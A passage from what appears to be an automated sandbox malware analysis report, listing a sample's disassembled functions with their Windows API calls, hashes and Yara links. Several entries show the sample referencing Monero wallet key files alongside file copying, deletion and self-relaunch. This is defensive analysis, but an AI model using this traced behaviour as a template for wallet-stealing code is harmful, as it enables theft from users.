                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 69bb466a487a79c2c4870b73f2e0f6210884b0adebbb414764603f7ba7736aad
                        • Instruction ID: dd9728c95cbffb64de7fd453399418b58fe25d836d742395c66804da63aea235
                        • Opcode Fuzzy Hash: 69bb466a487a79c2c4870b73f2e0f6210884b0adebbb414764603f7ba7736aad
                        • Instruction Fuzzy Hash: FD114FB1A44209EBD718CF94DD49F7BBBBCFB08710F10855AF705A7280D77859018BA1
                        Function 005F9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(0115DEB8,?,?,?,005F140C,?,0115DEB8,00000000), ref: 005F926C
                        • lstrcpyn.KERNEL32(0082AB88,0115DEB8,0115DEB8,?,005F140C,?,0115DEB8), ref: 005F9290
                        • lstrlen.KERNEL32(?,?,005F140C,?,0115DEB8), ref: 005F92A7
                        • wsprintfA.USER32 ref: 005F92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: c3e8b98b2934b5bd65bf193c563edb3519214ac5aa3ff1c19e48c7d4b8485ab9
                        • Instruction ID: c730dab68db405743880799f99ff8f6a09ecd0401798b3d3df1d0eb2b49ee3fe
                        • Opcode Fuzzy Hash: c3e8b98b2934b5bd65bf193c563edb3519214ac5aa3ff1c19e48c7d4b8485ab9
                        • Instruction Fuzzy Hash: A701DA75500208FFCB18DFECD988EAE7BB9FF48364F108548F9099B244C635AA41DB95
                        Function 005E12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005E12B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005E12BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005E12D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005E12F5
                        • RegCloseKey.ADVAPI32(?), ref: 005E12FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: ebcbe25669c64512609e28f717ccf7e39e23797f6e48cff66fa99c4be0b8b25d
                        • Instruction ID: 17e727a9a2e5779b9944122cee01a2d9d28789de388efe4ca51a9f3e65bafbbd
                        • Opcode Fuzzy Hash: ebcbe25669c64512609e28f717ccf7e39e23797f6e48cff66fa99c4be0b8b25d
                        • Instruction Fuzzy Hash: F401CDB9A40208BFDB18DFE4DC49FAEB7B8FF48701F108159FA45A7280D6759A018B55
                        Function 005F6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 005F6663
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005F6726
                        • ExitProcess.KERNEL32 ref: 005F6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 77a22c13279cbb0276d34141260c625b9917b3f5d88f26580be5c86f7cefd090
                        • Instruction ID: 2d69bd651249e11c727632216a2239230e5a868a773ce98175b236a664421969
                        • Opcode Fuzzy Hash: 77a22c13279cbb0276d34141260c625b9917b3f5d88f26580be5c86f7cefd090
                        • Instruction Fuzzy Hash: F3313CF1801209ABDB18EB90DD86BEE7B78BF44300F404198F31966191DFB86B49CF5A
                        Function 005F87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00600E28,00000000,?), ref: 005F882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F8836
                        • wsprintfA.USER32 ref: 005F8850
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 0478ad304783ccb518ee591c8bb207983d815358d321d06de766f6549e462e86
                        • Instruction ID: 9eeb180e55170229ec1d3c30b06129605db47d7a698d69b5fa863dea3a616fc7
                        • Opcode Fuzzy Hash: 0478ad304783ccb518ee591c8bb207983d815358d321d06de766f6549e462e86
                        • Instruction Fuzzy Hash: 6E2100B1A40208AFDB18DF94DD49FAEBBB8FF48711F108519F605A7280C779A9018BA5
                        Function 005F8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,005F951E,00000000), ref: 005F8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F8D62
                        • wsprintfW.USER32 ref: 005F8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 9aaefffa4c544db56080b4b91611861dd58c96c7c5ab1c2f33eab5010ed488e1
                        • Instruction ID: 3ffc80bc8c9082b5c7db2deb116af7c97f26eed9ac5abb4e60289f7492b0a417
                        • Opcode Fuzzy Hash: 9aaefffa4c544db56080b4b91611861dd58c96c7c5ab1c2f33eab5010ed488e1
                        • Instruction Fuzzy Hash: 7DE08CB0A40208BFDB28DB94DC0AE6977B8FF04702F0080A4FE0987280DA719E018B96
                        Function 005EA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005EA2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 005EA3FF
                        • lstrlen.KERNEL32(00000000), ref: 005EA6BC
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 005EA743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 521bd575bdec791c2266cb47e668f0b3f77779ba929c39907bec7a6e98bc5148
                        • Instruction ID: 0fd558d036bd9417283bf05e3ab3c407e1989c7067693a85ff4b1c03036b599c
                        • Opcode Fuzzy Hash: 521bd575bdec791c2266cb47e668f0b3f77779ba929c39907bec7a6e98bc5148
                        • Instruction Fuzzy Hash: 1DE112B281010D9BCB18EBA4DD99EFE7738BF54340F508169F61A72095EF746A09CB63
                        Function 005ED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005ED481
                        • lstrlen.KERNEL32(00000000), ref: 005ED698
                        • lstrlen.KERNEL32(00000000), ref: 005ED6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 005ED72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 9a2cd45b7f92d5ae703b1f9d73b5430ecfc702da94bcd33dc4d36e30920d6675
                        • Instruction ID: cfa80996775a1f610cfe9d158e13e9ce00ab714329ffb84ce76f5ec2f37e587a
                        • Opcode Fuzzy Hash: 9a2cd45b7f92d5ae703b1f9d73b5430ecfc702da94bcd33dc4d36e30920d6675
                        • Instruction Fuzzy Hash: ED91F1B281010D9BDB18FBA0DD59DFE7738BF94340F508169F60A66095EF786A09CB63
                        Function 005ED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F8B60: GetSystemTime.KERNEL32(00600E1A,0115A8D0,006005AE,?,?,005E13F9,?,0000001A,00600E1A,00000000,?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005F8B86
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005ED801
                        • lstrlen.KERNEL32(00000000), ref: 005ED99F
                        • lstrlen.KERNEL32(00000000), ref: 005ED9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 005EDA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: b4f5f2f29c81c7b97c3aea16f588d84487c3c0bb383380c989e64193a6ab2752
                        • Instruction ID: 88de6447a50479023ce62abed5d69ffcdb27ea66ce6da42097e0fc1f8d63c56e
                        • Opcode Fuzzy Hash: b4f5f2f29c81c7b97c3aea16f588d84487c3c0bb383380c989e64193a6ab2752
                        • Instruction Fuzzy Hash: 1A8102B181010D9BDB18FBA0DD59DFE7738BF94340F508528F64AA6095EF786A09CB63
                        Function 005EF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005E99EC
                          • Part of subcall function 005E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005E9A11
                          • Part of subcall function 005E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005E9A31
                          • Part of subcall function 005E99C0: ReadFile.KERNEL32(000000FF,?,00000000,005E148F,00000000), ref: 005E9A5A
                          • Part of subcall function 005E99C0: LocalFree.KERNEL32(005E148F), ref: 005E9A90
                          • Part of subcall function 005E99C0: CloseHandle.KERNEL32(000000FF), ref: 005E9A9A
                          • Part of subcall function 005F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005F8E52
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005FA920: lstrcpy.KERNEL32(00000000,?), ref: 005FA972
                          • Part of subcall function 005FA920: lstrcat.KERNEL32(00000000), ref: 005FA982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00601580,00600D92), ref: 005EF54C
                        • lstrlen.KERNEL32(00000000), ref: 005EF56B
                        Strings
                        Memory Dump Source
